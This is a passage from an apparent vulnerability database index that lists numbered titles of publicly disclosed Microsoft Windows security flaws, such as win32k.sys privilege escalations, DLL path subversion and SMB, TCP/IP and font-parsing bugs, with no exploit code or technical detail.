[83796] Microsoft Windows DCOM RPCSS.exe Local Privilege Escalation [83751] Microsoft Windows Terminal Services LCA Issued Certificates Arbitrary Binary Signing Weakness [83750] Microsoft Windows Gadgets Unspecified Remote Code Execution [83660] Microsoft Windows TLS Protocol HTTPS Session Decryption Information Disclosure [83659] Microsoft Windows win32k.sys Keyboard Layout Handling Local Privilege Escalation [83658] Microsoft Windows win32k.sys Hook Procedure Creation Incorrect Type Handling Local Privilege Escalation [83657] Microsoft Windows ADO Cachesize Data Access Components Memory Object Handling Overflow [83656] Microsoft Windows File / Directory Name Handling Remote Code Execution [83453] Microsoft Windows ProfileList Registry Key Permission Weakness User Profile Subversion [83169] Microsoft Windows NT telnetd Service Port Scan Remote DoS [83126] Microsoft Windows NT Registry Plaintext Service Password Local Disclosure [82928] Microsoft Windows atmfd.dll OpenType Font (OTF) File Handling DoS [82858] Microsoft Windows win32k.sys Thread Creation Attempt Handling Race Condition Local Privilege Escalation [82857] Microsoft Windows TrueType Font Loading Font Resource Reference Counter Handling Local Overflow [82856] Microsoft Windows win32k.sys Clipboard Format Atom Name Handling Local Privilege Escalation [82855] Microsoft Windows win32k.sys String Atom Class Name Handling Local Privilege Escalation (2012-1865) [82854] Microsoft Windows win32k.sys String Atom Class Name Handling Local Privilege Escalation (2012-1864) [82851] Microsoft Windows Remote Desktop Protocol (RDP) Memory Object Handling Remote Code Execution [82850] Microsoft Windows User Mode Scheduler Memory Corruption Local Privilege Escalation [82849] Microsoft Windows BIOS Memory Handling ROM Corruption Local Privilege Escalation [82693] Microsoft Windows Terminal Server Licensing Service MD5 Hash Collision Code Signing Spoofing [82605] Microsoft Windows Explorer Crafted Subdirectory Parent Directory Deletion Local DoS [82604] Microsoft Windows Media Player Streamed Broadcast Handling Remote Overflow [82505] Microsoft Windows IE Instances Overflow Group Policy Bypass [82491] Microsoft Windows UTF Character Set File Extension Spoofing Weakness [81736] Microsoft Windows GDI+ EMF File Record Handling Remote Code Execution [81735] Microsoft Windows Partition Manager (partmgr.sys) PnP Configuration Manager Function Call Handling Local Privilege Escalation [81730] Microsoft Windows tcpip.sys Outbound Packet Filtering Windows Firewall Bypass [81729] Microsoft Windows tcpip.sys Double-free IPv6 Address Binding Parsing Local Privilege Escalation [81720] Microsoft Windows t2embed.dll Module TTF File Handling Remote Code Execution [81717] Microsoft Windows win32k.sys Scrollbar Calculation Handling Local Privilege Escalation [81716] Microsoft Windows win32k.sys Keyboard Layout File Handling Local Privilege Escalation [81715] Microsoft Windows win32k.sys Windows and Messages Handling Local Privilege Escalation [81699] Microsoft Windows xxxCreateWindowEx() Function Invalid Memory Access Local DoS [81135] Microsoft Windows Authenticode Signature Verification Functionality Signed Portable Executable File Digest Validation Remote Code Execution [80005] Microsoft Windows DNS Server Domain Resource Record Query Parsing Remote DoS [80004] Microsoft Windows Remote Desktop Protocol Terminal Server RDP Packet Parsing Remote DoS [80003] Microsoft Windows DirectWrite Unicode Character Parsing Remote DoS [80002] Microsoft Windows win32k.sys PostMessage() Function Local Privilege Escalation [80000] Microsoft Windows Remote Desktop Protocol Array Element Loading Handling Double-free Remote Code Execution [79442] Microsoft Windows Server 2008 DNS Server Service Cache Update Policy Deleted Domain Name Resolving Weakness [79269] Microsoft Windows win32k.sys Use-after-free Keyboard Layout Memory Dereference Local Privilege Escalation [79259] Microsoft Windows C Run-Time Library msvcrt.dll Meta File Handling Remote Overflow [79253] Microsoft Windows Ancillary Function Driver (afd.sys) User Mode Input Parsing Local Privilege Escalation [79252] Microsoft Windows Ancillary Function Driver (afd.sys) AfdPoll User Mode Input Parsing Local Privilege Escalation [79117] Microsoft Windows Program Group Path Subversion Arbitrary DLL Injection Code Execution [78759] Microsoft Windows ICMPv6 Echo Request Remote Promiscuous Mode Detection [78212] Microsoft Windows Object Packager Path Subversion packager.exe Loading Remote Code Execution [78211] Microsoft Windows Line21 DirectShow Filter Media File Handling Remote Code Execution [78210] Microsoft Windows Multimedia Library (winmm.dll) MIDI File Handling Remote Code Execution [78209] Microsoft Windows Ntdll.dll Structured Exception Handling Tables Loading SafeSEH Security Bypass [78207] Microsoft Windows Embedded ClickOnce Application Office File Handling Remote Code Execution [78206] Microsoft Windows Client/Server Run-time Subsystem (CSRSS) Unicode Character Parsing Local Privilege Escalation [78010] Microsoft Windows Phone Text Message Parsing Remote DoS [77908] Microsoft Windows win32k.sys Safari IFRAME Height Attribute Handling Remote Memory Corruption [77667] Microsoft Windows Active Directory Query Parsing Remote Overflow [77666] Microsoft Windows Kernel Exception Handler Local Privilege Escalation [77663] Microsoft Windows Object Linking and Embedding (OLE) Object File Handling Remote Code Execution [77662] Microsoft Windows CSRSS Device Event Message Parsing Local Privilege Escalation [77660] Microsoft Windows Media Player / Center DVR-MS File Handling Remote Memory Corruption [77620] Microsoft Windows IE Sandbox Restriction Bypass Local Privilege Escalation [77262] Microsoft Windows win32k.sys Driver Keyboard Layout File Handling Local DoS [77213] Microsoft Windows AppLocker Rule Weakness Local Access Restriction Bypass [76902] Microsoft Windows Active Directory LDAPS CRL Handling Weakness Authentication Bypass [76901] Microsoft Windows Mail / Windows Meeting Space Path Subversion Arbitrary DLL Injection Code Execution [76900] Microsoft Windows Malformed TrueType Font Parsing DoS [76899] Microsoft Windows TCP/IP Reference Counter Crafted UDP Packet Stream Remote Overflow [76843] Microsoft Windows Win32k TrueType Font Handling Privilege Escalation [76232] Microsoft Windows Ancillary Function Driver afd.sys Local Privilege Escalation [76231] Microsoft Windows Active Accessibility Path Subversion Arbitrary DLL Injection Code Execution [76221] Microsoft Windows win32k.sys Driver Use-after-free Driver Object Handling Arbitrary Code Execution [76220] Microsoft Windows win32k.sys Driver .fon Font File Handling Overflow [76219] Microsoft Windows win32k.sys Driver Type Translation TrueType Font File Handling DoS [76218] Microsoft Windows win32k.sys Driver NULL Dereference Unspecified Arbitrary Code Execution [76205] Microsoft Windows Media Center Path Subversion Arbitrary DLL Injection Code Execution [75473] Microsoft Windows Explorer shmedia.dll AVI File Handling Remote DoS [75444] Microsoft Windows WINS Loopback Interface Crafted Packet Local Privilege Escalation [75382] Microsoft Windows Shell Extensions Path Subversion Arbitrary DLL Injection Code Execution [75260] Microsoft Windows IPv6 Router Advertisement (RA) MitM Weakness [75199] Intel G41 Driver for Microsoft Windows Unspecified Page Handling DoS [75197] NVIDIA Geforce 310 Driver on Microsoft Windows Unspecified Page Handling DoS [75195] Microsoft Windows GPU Support Functionality Unspecified Page Handling DoS [74483] Microsoft Windows TCP/IP Stack (Tcpip.sys) QoS URL Request Parsing Remote DoS [74482] Microsoft Windows TCP/IP Stack (Tcpip.sys) ICMP Message Parsing Remote DoS [74408] Microsoft Windows Data Access Tracing Component Path Subversion Arbitrary DLL Injection Code Execution [74407] Microsoft Windows Kernel File Metadata Handling Remote DoS [74406] Microsoft Windows Remote Desktop Web Access Logon Page Unspecified XSS [74405] Microsoft Windows Remote Desktop Protocol RDP Packet Parsing Remote DoS [74402] Microsoft Windows Remote Access Service NDISTAPI Driver User Input Validation Weakness Local Privilege Escalation [74401] Microsoft Windows Client/Server Run-time Subsystem (CSRSS) Inter-Process Device Event Message Parsing Local Privilege Escalation [74400] Microsoft Windows DNS Service Non-Existent Domain Query Parsing Remote DoS [74399] Microsoft Windows DNS Service NAPTR Query Parsing Overflow [74265] Microsoft Windows CSRSS winsrv.dll SrvGetConsoleTitle() Function Type Casting Weakness Local DoS [73880] ArcSight Connector Appliance Windows Event Log SmartConnector Microsoft OS Version Field XSS [73799] Microsoft Windows Bluetooth Driver Object Handling Remote Code Execution [73796] Microsoft Windows CSRSS SrvSetConsoleLocalEUDC() Function NULL Page Data Write Local Privilege Escalation [73795] Microsoft Windows CSRSS SrvWriteConsoleOutputString() Function Local Overflow [73794] Microsoft Windows CSRSS SrvWriteConsoleOutput() Function Local Overflow [73793] Microsoft Windows CSRSS SrvSetConsoleNumberOfCommand() Function Kernel Memory Access Local Privilege Escalation [73792] Microsoft Windows CSRSS AllocConsole() Function Multiple Console Object Orphaning Local Privilege Escalation [73791] Microsoft Windows win32k.sys Driver Function Argument Validation Unspecified Local Information Disclosure [73790] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-1888) [73789] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-1887) [73788] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-1885) [73787] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-1881) [73786] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-1880) [73785] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1875) [73784] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1884) [73783] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1883) [73782] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1882) [73781] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1879) [73780] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1878) [73779] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1877) [73778] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1876) [73777] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1874) [73654] Microsoft Windows fxsst.dll Path Subversion DLL Injection Code Execution [73602] Microsoft Windows nsiproxy.sys Local DoS [72959] Microsoft Windows Object Linking and Embedding (OLE) Automation Remote Code Execution [72955] Microsoft Windows Ancillary Function Driver Local Privilege Escalation [72937] Microsoft Windows Active Directory Certificate Services Web Enrollment XSS [72936] Microsoft Windows Server Service Crafted SMB Request Parsing Remote DoS [72935] Microsoft Windows MHTML Mime-Formatted Request Unspecified XSS [72930] Microsoft Windows Hyper-V VMBus vmswitch.sys Crafted Packet Cross-guest Local DoS [72929] Microsoft Windows Distributed File System (DFS) Referral Response Handling Remote DoS [72928] Microsoft Windows Distributed File System (DFS) Response Handling Memory Corruption Remote Code Execution [72919] Microsoft Windows OpenType Font (OTF) Pointer Validation Arbitrary Code Execution [72676] Microsoft Windows Kernel-mode GS Cookie Entropy Weakness [72672] Microsoft Windows AppFix systest.sdb Local DoS [72670] Microsoft Windows Server 2003 ActiveDirectory BROWSER ELECTION Remote Overflow [72234] Microsoft Windows WINS Service Failed Response Data Reuse Memory Corruption Remote Code Execution [71788] Microsoft Windows Messenger ActiveX Unspecified Remote Code Execution [71781] Microsoft Windows SMB Transaction Parsing Unspecified Remote Code Execution [71780] Microsoft Windows DNS Client Service LLMNR Query Processing Remote Code Execution [71779] Microsoft Windows/Office GDI+ (gdiplus.dll) EMF File Processing Overflow [71778] Microsoft Windows Wordpad Word 97 Converter sprmTTextFlow / sprmTSplit PRLs Parsing Memory Corruption [71776] Microsoft Windows OpenType Font (OTF) Driver Font Processing Overflow [71775] Microsoft Windows Fax Cover Page Editor fxscover.exe Text Element Handling Memory Corruption [71774] Microsoft Windows JScript / VBScript Engine Scripting Memory Reallocation Overflow [71773] Microsoft Windows Common Internet File System (CIFS) Malformed Browser Message Handling Overflow [71772] Microsoft Windows SMB Client Response Parsing Unspecified Remote Code Execution [71757] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1242) [71756] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1241) [71755] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1240) [71754] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1239) [71753] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1238) [71752] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1237) [71751] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1236) [71750] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1235) [71749] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-1234) [71748] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-0675) [71747] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-0674) [71746] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-0672) [71745] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-0671) [71744] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-0670) [71743] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-0667) [71742] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-0666) [71741] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-0665) [71740] Microsoft Windows win32k.sys Driver Use After Free Unspecified Local Privilege Escalation (2011-0662) [71739] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-1233) [71738] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-1232) [71737] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-1231) [71736] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-1230) [71735] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-1229) [71734] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-1228) [71732] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-1227) [71731] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-1226) [71730] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-1225) [71729] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-0677) [71728] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-0676) [71727] Microsoft Windows win32k.sys Driver NULL Pointer De-reference Unspecified Local Privilege Escalation (2011-0673) [71671] Microsoft Windows afd.sys 120CFh IOCTL Handling Local DoS [71667] Microsoft Windows SetDllDirectory Function Binary Planting Protection Bypass [71016] Microsoft Windows Media Player / Center .dvr-ms File Handling Arbitrary Code Execution [71015] Microsoft Windows DirectShow Path Subversion Arbitrary DLL Injection Code Execution [71014] Microsoft Windows Remote Desktop Client Path Subversion Arbitrary DLL Injection Code Execution [70885] Microsoft Windows LSASS Authentication Request Privilege Escalation [70881] Microsoft Windows SMB Browser Election Request Server Name String Overflow [70835] Microsoft Windows Kerberos Authentication Downgrade Weakness [70834] Microsoft Windows Kerberos Unkeyed Checksum Hashing Mechanism Service Ticket Forgery [70827] Microsoft Windows JScript / VBScript Scripting Engine Memory Corruption Information Disclosure [70826] Microsoft Windows CSRSS Logoff Process Termination Local Information Disclosure [70825] Microsoft Windows Server Active Directory Server Principal Name (SPN) Handling Remote DoS [70823] Microsoft Windows Kernel Trace Event (WmiTraceMessageVa) Handling Integer Truncation Local Privilege Escalation [70819] Microsoft Windows Kernel Unspecified User Input Validation Weakness Local Privilege Escalation (2011-0087) [70818] Microsoft Windows Kernel Unspecified User Input Validation Weakness Local Privilege Escalation (2011-0086) [70817] Microsoft Windows Kernel Class Improper Pointer Validation Unspecified Local Privilege Escalation [70816] Microsoft Windows Kernel Window Class Pointer Confusion Unspecified Local Privilege Escalation [70814] Microsoft Windows Kernel Unspecified Memory Corruption Local Privilege Escalation [70693] Microsoft Windows MHTML Protocol Handler MIME Formatted Request XSS [70689] Microsoft Windows USB Human Interface Device Functionality Warning Weakness Arbitrary Program Execution [70390] Microsoft Windows IPv6 Stack Neighbor Discovery Router Advertisement Message Saturation Remote DoS [70263] Microsoft Windows Bitmap Thumbnail shimgvw.dll CreateSizedDIBSECTION() Function biClrUsed Parameter Overflow [70126] Microsoft Windows Fax Cover Page Editor CDrawPoly::Serialize() Function Overflow [70000] Microsoft Windows Remote Access Phonebook (rasphone.exe) Path Subversion Arbitrary EXE Injection Code Execution [69824] Microsoft Windows Consent User Interface Local Privilege Escalation [69823] Microsoft Windows Routing and Remote Access NDProxy Unspecified Local Code Execution [69822] Microsoft Windows OpenType Font Driver CMAP Table Parsing Arbitrary Code Execution [69821] Microsoft Windows OpenType Font Driver Pointer Handling Double-free Arbitrary Code Execution [69820] Microsoft Windows OpenType Font Driver Index Array Unspecified Code Execution [69819] Microsoft Windows Netlogon RPC Service Crafted Request Remote DoS [69818] Microsoft Windows Hyper-V VMBus Crafted Packet Local DoS [69816] Microsoft Windows BranchCache Path Subversion Arbitrary DLL Injection Code Execution [69802] Microsoft Windows win32k.sys Cursor Linking Unspecified Local Privilege Escalation [69801] Microsoft Windows win32k.sys WriteAV Unspecified Local Privilege Escalation [69800] Microsoft Windows win32k.sys Unspecified Double-free Local Privilege Escalation [69799] Microsoft Windows win32k.sys PFE Pointer Double-free Local Privilege Escalation [69798] Microsoft Windows win32k.sys Unspecified Memory Corruption Local Privilege Escalation [69797] Microsoft Windows win32k.sys Unspecified Local Overflow [69501] Microsoft Windows win32k.sys Driver GreEnableEUDC() Function Local Overflow [69465] Microsoft Windows win32k.sys NtGdiEnableEUDC Local Overflow Privilege Escalation [68946] Microsoft Windows DAO Object Library Path Subversion Arbitrary DLL Injection Code Execution [68933] Microsoft Windows Shell32.dll Environment Variable Expansion SetDllDirectory Function Bypass [68857] Microsoft Windows XP wscript.exe Path Subversion Arbitrary DLL Injection Code Execution [68586] Microsoft Windows LRPC Server LPC Message Handling Local Privilege Escalation [68560] Microsoft Windows SChannel TLSv1 Crafted Client Certificate Request DoS [68559] Microsoft Windows OpenType Font Parsing Unspecified Remote Code Execution [68558] Microsoft Windows OpenType Malformed Font Validation Remote Code Execution [68557] Microsoft Windows Media Player Reload Operation Object Deallocation Memory Corruption [68554] Microsoft Windows Server 2008 Shared Cluster Disks Addition Default Permission Weakness [68553] Microsoft Windows t2embed.dll Embedded OpenType Font Parsing hdmx Record Parsing Overflow [68552] Microsoft Windows win32k.sys Driver Keyboard Layout Loading Local Privilege Escalation [68551] Microsoft Windows win32k.sys Driver Window Class Data Validation Local Privilege Escalation [68550] Microsoft Windows Media Player Network Sharing Service RTSP Use-after-free Remote Code Execution [68549] Microsoft Windows Common Control Library (comctl32.dll) Third-party SVG Content Handling Overflow [68532] Microsoft Windows rpcrt4.dll LRPC_SCALL::SendRequest() Function LPC Message Local Overflow DoS [68518] Microsoft Windows on 32-bit Task Scheduler Crafted Application Local Privilege Escalation [68517] Microsoft Windows on 32-bit win32k.sys Keyboard Layout Loading Local Privilege Escalation [67988] Microsoft Windows Print Spooler Service RPC Impersonation StartDocPrinter Procedure Remote Code Execution [67987] Microsoft Windows LSASS Implementation Malformed LDAP Message Handling Remote Overflow [67986] Microsoft Windows Client/Server Runtime Subsystem (CSRSS) Local Privilege Escalation [67985] Microsoft Windows MPEG-4 Codec Content Parsing Overflow [67983] Microsoft Windows WordPad Text Converters Document Parsing Memory Corruption [67981] Microsoft Windows RPC Response Processing Remote Memory Corruption [67784] Microsoft Windows Media Encoder Path Subversion Arbitrary DLL Injection Code Execution [67783] Microsoft Windows SDK for Windows 7 / .NET Framework 4 GraphEdit Path Subversion Arbitrary DLL Injection Code Execution [67722] Microsoft Windows Internet Connection Signup Wizard Path Subversion Arbitrary DLL Injection Code Execution [67600] Microsoft Windows Media Player Path Subversion Arbitrary DLL Injection Code Execution [67599] Microsoft Windows Live Messenger Path Subversion Arbitrary DLL Injection Code Execution [67553] Microsoft Windows Contacts Path Subversion Arbitrary DLL Injection Code Execution [67552] Microsoft Windows Internet Communication Settings Path Subversion Arbitrary DLL Injection Code Execution [67551] Microsoft Windows Indeo Codec (ac25_32.ax) Path Subversion Arbitrary DLL Injection Code Execution [67548] Microsoft Windows Vista BitLocker Drive Encryption Path Subversion Arbitrary DLL Injection Code Execution [67543] Microsoft Windows Movie Maker Path Subversion Arbitrary OCX Injection Code Execution [67535] Microsoft Windows Progman Group Converter Path Subversion Arbitrary DLL Injection Code Execution [67500] Microsoft Windows Live Mail Path Subversion Arbitrary DLL Injection Code Execution [67408] Microsoft Windows Ipv4SetEchoRequestCreate() Interruption DoS [67083] Microsoft Windows TAPI Server (TAPISRV) Service Isolation Bypass Local Privilege Escalation [67005] Microsoft Windows TCP/IP Implementation IppSortDestinationAddresses() Function Local Overflow [67004] Microsoft Windows Malformed IPv6 Extension Header Handling Remote Memory Corruption DoS [66990] Microsoft Windows Kernel Object ACL Validation SeObjectCreateSaclAccessBits() Local DoS [66989] Microsoft Windows Kernel Object Initialization Error Handling Local Privilege Escalation [66988] Microsoft Windows Kernel Thread Creation Handling NtCreateThread() Local Privilege Escalation [66987] Microsoft Windows SChannel Malformed Certificate Request Remote Code Execution [66986] Microsoft Windows Movie Maker Imported Projector File (.MSWMM) String Parsing Overflow [66985] Microsoft Windows MPEG Layer-3 Audio Stream Decoding Overflow [66984] Microsoft Windows iccvid.dll VIDC (Cinepak) Codec Decompression Arbitrary Code Execution [66983] Microsoft Windows win32k.sys Driver xxxCreateWindowsEx hParent Value Handling Local Privilege Escalation [66982] Microsoft Windows win32k.sys Driver User Mode Input Unspecified Local Privilege Escalation [66981] Microsoft Windows win32k.sys Driver User Mode Copy Memory Allocation Local Privilege Escalation [66979] Microsoft Windows win32k.sys Driver GreStretchBltInternal() Handling Local DoS [66978] Microsoft Windows Tracing Feature for Services Registry String Handling Memory Corruption Local Privilege Escalation [66977] Microsoft Windows Tracing Feature for Services Registry Key ACL Local Privilege Escalation [66976] Microsoft Windows SMB Server Compounded Request Handling Stack Exhaustion Remote DoS [66975] Microsoft Windows SMB Server Crafted Packet Handling Unspecified Remote DoS [66974] Microsoft Windows SMB Server SMB_COM_TRANSACTION2 Request Handling Remote Code Execution [66934] Microsoft Windows win32k.sys CreateDIBPalette() Function Local Overflow [66387] Microsoft Windows Shell LNK File Parsing Arbitrary Command Execution [66003] Microsoft Windows win32k.sys NtUserCheckAccessForIntegrityLevel Use-After-Free Local Privilege Escalation [66001] Microsoft Windows mshtml.dll CTimeoutEventList::InsertIntoTimeoutList Local Pointer Disclosure [65529] Microsoft Windows Help and Support Center sysinfo/sysinfomain.htm svr Parameter XSS [65264] Microsoft Windows hcp:// Protocol Handler MPC::HexToNum() Function String Miscalculation Arbitrary Command Execution [65225] Microsoft Windows Kernel-Mode Driver Window Creation Local Privilege Escalation [65224] Microsoft Windows Kernel-Mode Driver Win32k.sys GetDCEx() Function Device Contexts (DC) Handling Local Privilege Escalation [65223] Microsoft Windows Kernel-Mode Driver TrueType Font Parsing Local Privilege Escalation [65222] Microsoft Windows MJPEG Media Decompression Unspecified Remote Code Execution [65221] Microsoft Windows Media Decompression Unspecified Remote Code Execution [65219] Microsoft Windows / Office COM Object Instantiation Validation Remote Code Execution [65217] Microsoft Windows OpenType Compact Font Format (CFF) Driver Privilege Escalation [64928] Microsoft Windows SMB Client Transaction Response Handling Memory Corruption (2010-0476) [64927] Microsoft Windows SMB Client Transaction SMB_COM_TRANSACTION2 Response Handling Memory Corruption [64926] Microsoft Windows SMB Client Unspecified Response Handling Memory Corruption (2010-0477) [64925] Microsoft Windows SMB Client Unspecified Response Handling Memory Corruption (2010-0269) [64731] Microsoft Windows Canonical Display Driver (cdd.dll) Unspecified Memory Corruption [64530] Microsoft Outlook Express / Windows Mail STAT Response Overflow [64391] Microsoft Windows Group Policy Management Editor Account Password Removal Weakness [64341] Microsoft Windows Unspecified SMB Negotiation Remote DoS [64340] Microsoft Windows RRAS InterfaceAdjustVLSPointers Null Dereference Remote DoS [64058] Microsoft Windows win32k.sys SfnINSTRING() Local DoS [64057] Microsoft Windows win32k.sys Driver SfnLOGONNOTIFY() Function Local Privilege Escalation [63765] Microsoft Windows Media Player ActiveX fourCC Compression Code Codec Retrieval Arbitrary Code Execution [63749] Microsoft Windows MPEG Layer-3 Audio Decoder AVI File Handling Overflow [63747] Microsoft Windows ISATAP Component IPv6 Tunneled Packet IP Address Spoofing Weakness [63746] Microsoft Windows Authenticode Signature Verification Cabview Manipulation Privilege Escalation [63745] Microsoft Windows Authenticode WinVerifyTrust Signature Manipulation Validation Bypass [63739] Microsoft Windows SMTP / Exchange Server Malformed Command Sequence Remote Information Disclosure [63738] Microsoft Windows SMTP / Exchange Server DNS Mail Exchanger (MX) Resource Record Handling Remote DoS [63736] Microsoft Windows Kernel Symbolic Link Value Processing Unspecified Local DoS [63735] Microsoft Windows Kernel Exception Handling Unspecified Local DoS [63733] Microsoft Windows Kernel Registry Link Symbolic Link Extraction Local Privilege Escalation [63732] Microsoft Windows Kernel Malformed Image Handling Local DoS [63731] Microsoft Windows Kernel Registry Hive Symbolic Link Creation Local Privilege Escalation [63730] Microsoft Windows Kernel Registry Key Validation Unspecified Local DoS [63729] Microsoft Windows Kernel Virtual Path Parsing Local DoS [63728] Microsoft Windows Unspecified Kernel System Call Registry Handling Local DoS [63726] Microsoft Windows Media Unicast Service Transport Packet Handling Remote Overflow [63468] Microsoft Windows ANI Parser BITMAPINFO Header Crafted biClrUsed Value DoS [63231] Microsoft Windows Media Player Crafted AVI File Colorspace Conversion Memory Corruption [62855] Microsoft Windows HTML Help Control ActiveX chm File Handling Arbitrary Code Execution [62811] Microsoft Windows Movie Maker / Producer IsValidWMToolsStream() Function Project File (.MSWMM) Handling Overflow [62756] Microsoft Windows VBScript MsgBox() Function helpfile Argument Arbitrary Command Execution [62660] Microsoft Windows Unspecified API Argument Validation Local DoS [62652] Microsoft Windows Media Player Crafted MPG File Handling Overflow DoS [62637] Microsoft Windows Malformed TCP SYN Packet Remote DoS (Blat) [62632] Microsoft Windows VBScript MsgBox() Function HLP File Arbitrary Command Execution [62259] Microsoft Windows Kernel Double-free Unspecified Local Privilege Escalation [62258] Microsoft Windows Kerberos Ticket-Granting-Ticket Renewal Request NULL Dereference Remote DoS [62257] Microsoft Windows DirectShow AVI File Decompression Overflow [62256] Microsoft Windows SMB Server Crafted Network Message Remote Code Execution [62255] Microsoft Windows SMB Server Crafted Packet Handling Remote DoS [62254] Microsoft Windows SMB Server Crafted Packet Handling NULL Dereference Remote DoS [62253] Microsoft Windows SMB Server NTLM Authentication Nonce Entropy Weakness [62252] Microsoft Windows Client/Server Run-time Subsystem (CSRSS) Session Termination Weakness Local Privilege Escalation [62251] Microsoft Windows Server 2008 Hyper-V Crafted Instruction Sequence DoS [62250] Microsoft Windows TCP/IP Stack ICMPv6 Router Advertisement Packet Handling Remote Code Execution [62249] Microsoft Windows TCP/IP Stack ESP Over UDP Header MDL Fragmentation Remote Code Execution [62248] Microsoft Windows TCP/IP Stack ICMPv6 Route Information Packet Handling Remote Code Execution [62247] Microsoft Windows TCP/IP Selective Acknowledgment (SACK) Value Handling Remote DoS [62245] Microsoft Windows Shell Handler ShellExecute API Crafted URL Arbitrary Command Execution [62244] Microsoft Windows SMB Client Negotiate Protocol Response Handling Remote Code Execution [62243] Microsoft Windows SMB Client Packet Handling Race Condition Remote Privilege Escalation [62242] Microsoft Windows Paint JPEG Image Decoding Overflow [61854] Microsoft Windows Virtual DOS Machine (VDM) Subsystem #GP Trap Handler (nt!KiTrap0D) Local Privilege Escalation [61676] Microsoft Windows Live Messenger msnmsgr.exe ActiveX (msgsc.14.0.8089.726.dll) ViewProfile Method MSN Messenger Session Remote DoS [61651] Microsoft Windows Embedded OpenType Font Engine LZCOMP Decompressor Font Handling Arbitrary Code Execution [61037] Microsoft Windows Indeo Codec Crafted Media Content Arbitrary Code Execution (2009-4312) [61036] Microsoft Windows Indeo Codec Crafted Media Content Arbitrary Code Execution (2009-4311) [60858] Microsoft Windows Intel Indeo32 Codec (ir32_32.dll) IV32 FourCC Code Handling Heap Corruption [60857] Microsoft Windows Indeo Codec Unspecified Memory Corruption [60856] Microsoft Windows Intel Indeo41 Codec IV41 Stream Video Decompression Overflow [60855] Microsoft Windows Intel Indeo41 Codec IV41 movi Record Handling Overflow [60836] Microsoft Windows Active Directory Federation Services (ADFS) Request Header Handling Remote Code Execution [60835] Microsoft Windows Active Directory Federation Services (ADFS) Single Sign-on Spoofing [60833] Microsoft Windows Internet Authentication Service Crafted MS-CHAP v2 Message Remote Authentication Bypass [60832] Microsoft Windows Internet Authentication Service Protected Extensible Authentication Protocol (PEAP) Message Handling Remote Memory Corruption [60831] Microsoft Windows Local Security Authority Subsystem (LSASS) ISAKMP Message Handling Resource Exhaustion Remote DoS [60368] Microsoft Windows Terminal Services msgina.dll Unrestricted Resource Lock Remote DoS [60329] Microsoft Windows 2000 NetBIOS Continuation Packet Remote DoS [60273] Microsoft Windows NT Virtual DOS Machine 16-bit Executable Permission Bypass Local Privilege Escalation [60225] Microsoft Windows XP System Restore Directory ACL Weakness Local Privilege Escalation [60210] Microsoft Windows Active Directory Malformed LDAP Client Request Remote DoS [60206] Microsoft Windows Fast User Switching (FUS) Arbitrary User Process Listing Disclosure [60145] Microsoft Windows NT cmd.exe CD Command Arbitrary Local Code Execution [60057] Microsoft Windows File Protection (WFP) Catalog File (.CAT) Modification Hash Code Comparison Bypass [59957] Microsoft Windows SMB Response Handling Remote DoS [59869] Microsoft Windows Win32k Table of Directory Entry Building Font Code Parsing Remote Code Execution [59868] Microsoft Windows Win32k GDI Kernel Component Unspecified Local Privilege Escalation [59867] Microsoft Windows Win32k Unspecified Kernel System Call Local Privilege Escalation [59865] 